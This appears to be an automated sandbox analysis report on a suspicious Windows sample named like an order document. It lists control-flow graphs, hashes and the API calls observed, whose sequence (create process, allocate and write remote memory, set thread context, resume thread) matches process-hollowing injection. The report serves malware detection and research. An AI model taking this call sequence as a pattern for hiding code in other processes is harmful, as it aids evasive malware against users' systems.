                                • Instruction ID: e3bdc0618a519abada68dea690c05913298332e3e34d159f934c4c19a35b0a0c
                                • Opcode Fuzzy Hash: 60bcd42d1b51265a7056d09b3ed1f0f23e14c60016644b59263bde7a6eed332b
                                • Instruction Fuzzy Hash: 66917BB1D0025ACFDF24CF68C8457EDBBB2BF49310F18816AD80AA7254DB759985CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1263 7610de0-7610e75 1265 7610e77-7610e81 1263->1265 1266 7610eae-7610ece 1263->1266 1265->1266 1267 7610e83-7610e85 1265->1267 1271 7610ed0-7610eda 1266->1271 1272 7610f07-7610f36 1266->1272 1269 7610e87-7610e91 1267->1269 1270 7610ea8-7610eab 1267->1270 1273 7610e93 1269->1273 1274 7610e95-7610ea4 1269->1274 1270->1266 1271->1272 1275 7610edc-7610ede 1271->1275 1282 7610f38-7610f42 1272->1282 1283 7610f6f-7611029 CreateProcessA 1272->1283 1273->1274 1274->1274 1276 7610ea6 1274->1276 1277 7610f01-7610f04 1275->1277 1278 7610ee0-7610eea 1275->1278 1276->1270 1277->1272 1280 7610eec 1278->1280 1281 7610eee-7610efd 1278->1281 1280->1281 1281->1281 1284 7610eff 1281->1284 1282->1283 1285 7610f44-7610f46 1282->1285 1294 7611032-76110b8 1283->1294 1295 761102b-7611031 1283->1295 1284->1277 1287 7610f69-7610f6c 1285->1287 1288 7610f48-7610f52 1285->1288 1287->1283 1289 7610f54 1288->1289 1290 7610f56-7610f65 1288->1290 1289->1290 1290->1290 1291 7610f67 1290->1291 1291->1287 1305 76110c8-76110cc 1294->1305 1306 76110ba-76110be 1294->1306 1295->1294 1307 76110dc-76110e0 1305->1307 1308 76110ce-76110d2 1305->1308 1306->1305 1309 76110c0 1306->1309 1311 76110f0-76110f4 1307->1311 1312 76110e2-76110e6 1307->1312 1308->1307 1310 76110d4 1308->1310 1309->1305 1310->1307 1314 7611106-761110d 1311->1314 1315 76110f6-76110fc 1311->1315 1312->1311 1313 76110e8 1312->1313 1313->1311 1316 7611124 1314->1316 1317 761110f-761111e 1314->1317 1315->1314 1318 7611125 1316->1318 1317->1316 1318->1318
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07611016
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 806dbacb393706e012f29113578dc8ce4a16f70330d5993709281913cafddcc1
                                • Instruction ID: 7271869c5bcab5b2c760fb29ac14c0d8d00b54d38ae30b784f0f4c684b9bd29a
                                • Opcode Fuzzy Hash: 806dbacb393706e012f29113578dc8ce4a16f70330d5993709281913cafddcc1
                                • Instruction Fuzzy Hash: CB916AB1D0025ACFDF24CF69C845BEDBBB2BF49310F18816AD809A7254DB749985CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1320 107ada8-107adb7 1321 107ade3-107ade7 1320->1321 1322 107adb9-107adc6 call 107a0cc 1320->1322 1323 107adfb-107ae3c 1321->1323 1324 107ade9-107adf3 1321->1324 1329 107addc 1322->1329 1330 107adc8 1322->1330 1331 107ae3e-107ae46 1323->1331 1332 107ae49-107ae57 1323->1332 1324->1323 1329->1321 1375 107adce call 107b030 1330->1375 1376 107adce call 107b040 1330->1376 1331->1332 1333 107ae7b-107ae7d 1332->1333 1334 107ae59-107ae5e 1332->1334 1336 107ae80-107ae87 1333->1336 1337 107ae60-107ae67 call 107a0d8 1334->1337 1338 107ae69 1334->1338 1335 107add4-107add6 1335->1329 1339 107af18-107afd8 1335->1339 1340 107ae94-107ae9b 1336->1340 1341 107ae89-107ae91 1336->1341 1342 107ae6b-107ae79 1337->1342 1338->1342 1370 107afe0-107b00b GetModuleHandleW 1339->1370 1371 107afda-107afdd 1339->1371 1344 107ae9d-107aea5 1340->1344 1345 107aea8-107aeaa call 107a0e8 1340->1345 1341->1340 1342->1336 1344->1345 1349 107aeaf-107aeb1 1345->1349 1351 107aeb3-107aebb 1349->1351 1352 107aebe-107aec3 1349->1352 1351->1352 1353 107aec5-107aecc 1352->1353 1354 107aee1-107aeee 1352->1354 1353->1354 1356 107aece-107aede call 107a0f8 call 107a108 1353->1356 1360 107af11-107af17 1354->1360 1361 107aef0-107af0e 1354->1361 1356->1354 1361->1360 1372 107b014-107b028 1370->1372 1373 107b00d-107b013 1370->1373 1371->1370 1373->1372 1375->1335 1376->1335
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0107AFFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: c75839523aef0e1129c0765e3ab918ef1c53cd4f5afb3583b5955740fd11a638
                                • Instruction ID: d818aca73e95811fa9daa9e8d10c30787e845f13d8404ab0aae1621ef3a8cdec
                                • Opcode Fuzzy Hash: c75839523aef0e1129c0765e3ab918ef1c53cd4f5afb3583b5955740fd11a638
                                • Instruction Fuzzy Hash: B7713370A00B05CFEB65DF69D540B9ABBF1BF88300F04896DE48AD7A50DB34E849CB94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1377 10744b0-10759d9 CreateActCtxA 1380 10759e2-1075a3c 1377->1380 1381 10759db-10759e1 1377->1381 1388 1075a3e-1075a41 1380->1388 1389 1075a4b-1075a4f 1380->1389 1381->1380 1388->1389 1390 1075a51-1075a5d 1389->1390 1391 1075a60 1389->1391 1390->1391 1393 1075a61 1391->1393 1393->1393
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 010759C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: be0e667983b3bba0e89612ec1a117f7f0e1087d3f90bcb8a7702ce0f737a2856
                                • Instruction ID: 871679ec3ea6f24c05bc7027d01ec30f16d1622ee404fe20bb98186bfb0ebc4c
                                • Opcode Fuzzy Hash: be0e667983b3bba0e89612ec1a117f7f0e1087d3f90bcb8a7702ce0f737a2856
                                • Instruction Fuzzy Hash: 4241DDB0C0071DCADB24DFA9C984BDEBBF5BF49304F60806AD448AB255DBB56946CF90
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 010759C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: cb1046310c8cbb23bfa77fdec85ddc91e2f6ee54ac0051248c80f4835f001038
                                • Instruction ID: ae8729984cd1cccbfaa5cabb204ee48de3f9dd4856f4c46bde897f4702ce6354
                                • Opcode Fuzzy Hash: cb1046310c8cbb23bfa77fdec85ddc91e2f6ee54ac0051248c80f4835f001038
                                • Instruction Fuzzy Hash: 834111B0C0071DCADB24DFA9C884BCDBBF1BF49314F24816AD458AB295DB755986CF90
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05274101
                                Memory Dump Source
                                • Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 978a0e320f00ea178ce50ff902c5ee831f3c125274f298957bff7738b4dcf11b
                                • Instruction ID: 7839396e4f0b464987e9ea027dffe110cfcc89e2ed57781c7907770e74a6c256
                                • Opcode Fuzzy Hash: 978a0e320f00ea178ce50ff902c5ee831f3c125274f298957bff7738b4dcf11b
                                • Instruction Fuzzy Hash: C64137B4A10309CFDB14DF99C848AAABBF6FF88314F25C459D519AB361D375A841CFA0
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07610BE8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: b4a1ba5469bdcef09309bbdbbbfbf7570bc43847a445f0bec3efdd2bee8dffed
                                • Instruction ID: 4ec5a8dca4770384f32678d4957f163d9f33d9fae399dd1c5b9efa28dcd772b7
                                • Opcode Fuzzy Hash: b4a1ba5469bdcef09309bbdbbbfbf7570bc43847a445f0bec3efdd2bee8dffed
                                • Instruction Fuzzy Hash: 2F2126B59003199FCF10DFAAC985BEEBBF5FF48314F148429E919A7240D7799944CBA0
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07610BE8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 63f8e87816fd64a4f528f5140ccea4818b44ac20bbccb0c758364612c3edbeda
                                • Instruction ID: c275b9170ee25fc9a1d19c24175805675df88d0fd347be4cd5510aa966ac2fb1
                                • Opcode Fuzzy Hash: 63f8e87816fd64a4f528f5140ccea4818b44ac20bbccb0c758364612c3edbeda
                                • Instruction Fuzzy Hash: 382127B59003099FCF10DFAAC985BEEBBF5FF48310F148429E919A7240C7799944CBA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0107D656,?,?,?,?,?), ref: 0107D717
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: bccc769173694cf9cb184cf16456252190d39a371b450296c6ddf12bc5201d78
                                • Instruction ID: 3216a92f49a9065696a260d3a5df061cd5b232e17bda7823feeaddd2f61aa5b6
                                • Opcode Fuzzy Hash: bccc769173694cf9cb184cf16456252190d39a371b450296c6ddf12bc5201d78
                                • Instruction Fuzzy Hash: D421D4B5D002489FDB10DF9AD584AEEBBF5FF48310F14841AE958B7250D378A950CFA5
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07610A3E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: a48d4bb58665476cb9a7f715eaf733f8b591f9322332c85b77e79aded2511d53
                                • Instruction ID: c0fb278a4b58d6cf3f4bbded06c1be52107b2b6c4ed673f4aa0e6e9c7506e19c
                                • Opcode Fuzzy Hash: a48d4bb58665476cb9a7f715eaf733f8b591f9322332c85b77e79aded2511d53
                                • Instruction Fuzzy Hash: 312138B1D003099FDB10DFAAC485BEEBBF4EF88314F148429D519A7241CB789985CFA1
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07610CC8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0f878ac7a8f56840510f5e79a68a32b49fa663b893012112d4296dd502d5ebb7
                                • Instruction ID: 017506606251703bb6c2f4c9079eb226fb12a440a2e0c6cda5055368e3662c27
                                • Opcode Fuzzy Hash: 0f878ac7a8f56840510f5e79a68a32b49fa663b893012112d4296dd502d5ebb7
                                • Instruction Fuzzy Hash: 352128B5C002599FCF10DFA9C945AEEBBF5FF48320F14842AE559A7250D7389544CFA0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07610CC8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: af336ec9baccc9d733ec4993a272b53b0cd6a1c17bb3b0d5aeee10dfac93b96b
                                • Instruction ID: cba05a6689aadc94389eb4fd6172666dcb3dd5d3ce2990a101b871f82735a7c8
                                • Opcode Fuzzy Hash: af336ec9baccc9d733ec4993a272b53b0cd6a1c17bb3b0d5aeee10dfac93b96b
                                • Instruction Fuzzy Hash: 1721E4B18002599FCB10DFAAC985AEEBBF5FF48310F54842AE519A7250C7789944CFA1
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07610A3E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: e61c1ee2bc3340aae0156171cc2b5ada501a40b20b396a1223f025c141317e06
                                • Instruction ID: 1c21b58e20f19d2926ea5391183dd6f530cd055f0ba12a31e4d2a585acd448ca
                                • Opcode Fuzzy Hash: e61c1ee2bc3340aae0156171cc2b5ada501a40b20b396a1223f025c141317e06
                                • Instruction Fuzzy Hash: 492129B5D003099FDB10DFAAC585BEEBBF4EF88314F148429D519A7241CB789984CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0107D656,?,?,?,?,?), ref: 0107D717
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d51bb231a7e7c49d4954118b3c6e99bbbe37ade4c31275ea804ff7eff00da9cd
                                • Instruction ID: 92bc2defca788a75cc844c58e2a6ce3f9b840e72f07a4f9a7e34848e8f09c3a9
                                • Opcode Fuzzy Hash: d51bb231a7e7c49d4954118b3c6e99bbbe37ade4c31275ea804ff7eff00da9cd
                                • Instruction Fuzzy Hash: 1221E0B5D002489FDB10CFAAD584AEEBFF5FF48310F14841AE958A3250D378A954CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07610B06
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 877c19b63bb8edd11eb3eb3079f460b5f7c3ea7b48051728cd6717bee943a4a0
                                • Instruction ID: ed1a150254203dbb091cf00af97cd33ddcc207d22642266b49bcc3a0496b9d34
                                • Opcode Fuzzy Hash: 877c19b63bb8edd11eb3eb3079f460b5f7c3ea7b48051728cd6717bee943a4a0
                                • Instruction Fuzzy Hash: 561126B29002499FCF10DFAAC945BEEBFF5EF88324F148419E519A7254C779A940CFA1
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07610B06
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 952ac11acd4ce6f45a919de679554322dca91fedae75d12a29a92eb0bcdac9ad
                                • Instruction ID: 85380d93fe7254f7212994dd3ffa2212749a780beba22038a46afc86f3cfa2b3
                                • Opcode Fuzzy Hash: 952ac11acd4ce6f45a919de679554322dca91fedae75d12a29a92eb0bcdac9ad
                                • Instruction Fuzzy Hash: A51137B19002499FCF10DFAAC944BEEBFF5EF88320F148419E519A7250C779A540CFA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: be5ca1a912d6280d3a1ce520ef7f89309f5242d1b9b9be1a5fc9c2779df20265
                                • Instruction ID: 741075eaba2a44b36b418a5a7e74773be903f8f8349783625cbdd1acdc6115d3
                                • Opcode Fuzzy Hash: be5ca1a912d6280d3a1ce520ef7f89309f5242d1b9b9be1a5fc9c2779df20265
                                • Instruction Fuzzy Hash: 801146B1C002498BDB20DFAAC4457EEFBF4EF88324F14881AD519A7240CB39A940CBA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 9999500f0388a38cdd1543ad0f1171774f85ec6329447af302ca84ebd024b4a7
                                • Instruction ID: 26ca206801222eb5eab3cdba154eb651a6fd20fb3c798101a231e0c47a0bb7fb
                                • Opcode Fuzzy Hash: 9999500f0388a38cdd1543ad0f1171774f85ec6329447af302ca84ebd024b4a7
                                • Instruction Fuzzy Hash: 4F113AB1D003498FDB20DFAAC4457AEFBF5EF88320F148819D519A7250CB79A944CFA0
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0107AFFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 20fd750adc03e9a068252baa27b9319caaf3be33f58e357ca99d7da5ebe6e156
                                • Instruction ID: ec261005c5d1f207492aaff1d1e5e00efab536756a1edd890c7e3a21e50c8abc
                                • Opcode Fuzzy Hash: 20fd750adc03e9a068252baa27b9319caaf3be33f58e357ca99d7da5ebe6e156
                                • Instruction Fuzzy Hash: B2110FB5C002498FDB20DF9AC444A9EFBF4AF88314F14845AD568A7210D379A545CFA5
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 07613F5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: b4cdb2fc73fbee9c5ace4097121d5e7d196f5637e9c6f8c27bc58455ede4cfc0
                                • Instruction ID: c3f2f60794c4ff94f6e456cc33fd5bbaa62b20aff7916ce99fae665524c6b1b6
                                • Opcode Fuzzy Hash: b4cdb2fc73fbee9c5ace4097121d5e7d196f5637e9c6f8c27bc58455ede4cfc0
                                • Instruction Fuzzy Hash: 6011D3B58003499FDB10DF9AD889BDEBFF8EB48310F14845AE519A7340D379A944CFA5
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 07613F5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: b82d60c928d0bc54cc6185c5e16e29b947b50df40590f0a98156422521ccdb4c
                                • Instruction ID: 274ddcab43575dc8f9b9ec8efe1e99b6ac0e66737b1f3585c0eec7c1d38b04ab
                                • Opcode Fuzzy Hash: b82d60c928d0bc54cc6185c5e16e29b947b50df40590f0a98156422521ccdb4c
                                • Instruction Fuzzy Hash: B111D0B58003499FDB10DF9AD889BDEBBF8EB48320F14845AE519A7340C379A944CFA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4dd9587e3ef93c09e01b46b74c1d65c05e47a2652fbb9b4e8ee6809ffa6b5f4e
                                • Instruction ID: 707ae764f64208f533f746369fa49ca3232316c2f920ae6492139ca53b83e12b
                                • Opcode Fuzzy Hash: 4dd9587e3ef93c09e01b46b74c1d65c05e47a2652fbb9b4e8ee6809ffa6b5f4e
                                • Instruction Fuzzy Hash: 75210372504200DFEF05DF54D9C0B26BF65FB88320F30C569E9090B256C33AD816EBA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7cafb2a728b4a7abdd714e9a180246600dde18d7ddb1ca692c19db71b45e1de2
                                • Instruction ID: d33d770529746cfcb3c2c0d34964cfb2813db901e03e1fbf1a02415277dc5e8c
                                • Opcode Fuzzy Hash: 7cafb2a728b4a7abdd714e9a180246600dde18d7ddb1ca692c19db71b45e1de2
                                • Instruction Fuzzy Hash: 1B21F472900244DFEF15DF14D980B26BF65FB98328F34C569D9090B256C336D816E7A2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8348e615cfc387e934f7b5dd8aa3c543186b92e8609c6e2cce4a6fea7f7276a
                                • Instruction ID: 7d622b513b66d0b280060a0b83ffd148d1ed58861a93f17cb97ab3963a8d8ef9
                                • Opcode Fuzzy Hash: a8348e615cfc387e934f7b5dd8aa3c543186b92e8609c6e2cce4a6fea7f7276a
                                • Instruction Fuzzy Hash: 6D212575604200DFCB14EF24D980B16BF65FB88364F20C569D80A0B25AD33AD807EE62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d097db42b7a29a6c97b3cd35fa86bbaddbcfb82cdfe94459456800af40b7fbd7
                                • Instruction ID: 2e9c89109c78da579f885f1147b1d43ff0ee512c25baf990e6789a73f8d554fa
                                • Opcode Fuzzy Hash: d097db42b7a29a6c97b3cd35fa86bbaddbcfb82cdfe94459456800af40b7fbd7
                                • Instruction Fuzzy Hash: 52210771904244DFDB05DF15D9C0F66BB65FB84324F20C56DD9094B256D33AD806EF62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e079408fbe84b5434a077ec0852d27ab4511ce0273cfd6e3e5c0c9493ac22e5b
                                • Instruction ID: 320010005bd81ba543842032e1a47a4055aebacf88412c7a9df0aa3cf6513be9
                                • Opcode Fuzzy Hash: e079408fbe84b5434a077ec0852d27ab4511ce0273cfd6e3e5c0c9493ac22e5b
                                • Instruction Fuzzy Hash: E5219F755093C08FCB02DF24D994715BF71EB46324F28C5EAD8498F6A7C33A980ADB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                • Instruction ID: e3cb39c9a60cb00cea0a81bd843c7dde24e74f1de519cf87e9f2f8b3a961e1a6
                                • Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                • Instruction Fuzzy Hash: 07219D76904240DFDF06CF50D9C4B16BF62FB98324F24C5A9DD490A656C33AD82ADBA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: 3af952ecbdcc71d97f04250ed3a4e3f1a750a5d466aff7405ad6fabd46d4b69a
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: E611DF76804280CFDF06CF10D5C4B16BF71FB98328F28C6A9D9490B256C336D85ADBA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: e3f97914fb83d0d1f625e489e13f500cd0f5bc2e8cdfbacb093d5b677e493b87
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: C411BB75904280DFCB06CF10C9C4B15BFA1FB84324F24C6A9D8494B296C33AD80ADF62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e38de904df52247eb3a17c2bbd8f01a7b8186df77d1feadef81c413bd6983ce
                                • Instruction ID: 7bfb2cc9be981ab72a3f3d3d9008865742d361666f9ec3a81fd8270eb7910606
                                • Opcode Fuzzy Hash: 7e38de904df52247eb3a17c2bbd8f01a7b8186df77d1feadef81c413bd6983ce
                                • Instruction Fuzzy Hash: 3E012B714043449AFF209E95CD84B67BF9CEF56334F38C52AED084B286C2399801DA72
